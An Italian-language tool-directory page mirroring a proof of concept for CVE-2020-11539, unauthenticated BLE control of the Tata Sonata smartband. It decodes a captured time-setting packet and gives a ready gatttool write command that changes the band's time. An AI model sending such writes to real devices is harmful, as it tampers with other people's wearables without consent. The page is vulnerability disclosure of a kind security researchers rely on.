Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-11539 — Controllo di accesso improprio in Tata Sonata Smartband | Kitploit
Strumenti/GitHubGitHub/the-girl-who-lived/cve-2020-11539
Sicurezza BluetoothSicurezza IoTAnalisi delle VulnerabilitàExploitSicurezza WirelessSicurezza Hardware e IoT
GitHubthe-girl-who-lived/cve-2020-11539

CVE-2020-11539

Controllo di accesso improprio in Tata Sonata Smartband

Vedi Repository
116 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-11539: Controllo di accesso improprio in Tata Sonata Smartband

Informazioni

Descrizione: È stato identificato che il smart band non ha pairing (modalità 0 livello di sicurezza BLE). I dati trasmessi via etere non sono crittografati. Inoltre, i dati inviati al smart band non hanno alcuna autenticazione o verifica della firma, consentendo a qualsiasi attaccante di controllare i parametri del dispositivo.

Versioni interessate: Smart SF Rush - 1.12

Ricercatore: Sayli Ambure (https://twitter.com/sayli_ambure)

Link MITRE CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539

Proof-of-Concept Exploit

Descrizione

Il seguente pacchetto è stato invertito e trovato per cambiare l'ora; è possibile invertire più pacchetti estraendo il dump hcisnoop dal tuo telefono.

  1. Valore dati: 00870e00141401060712052b051e

    Hexdump dati:00870e00141401060712052b051e
    Dati decimali:00135140020200106071805430530
  • 00 87: Intestazione del pacchetto

  • 0e 00: Tipo di pacchetto

  • 14 14: Anno in esadecimale (2020)

  • 01 06: Mese e giorno (6 gennaio)

  • 07 12: Ora e minuti in esadecimale (07:18 AM)

  • 05 : Secondi

  1. Invia il seguente comando Gatttool per controllare l'ora del smart band:

gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e

Video del Proof of Concept:

Scarica lo strumento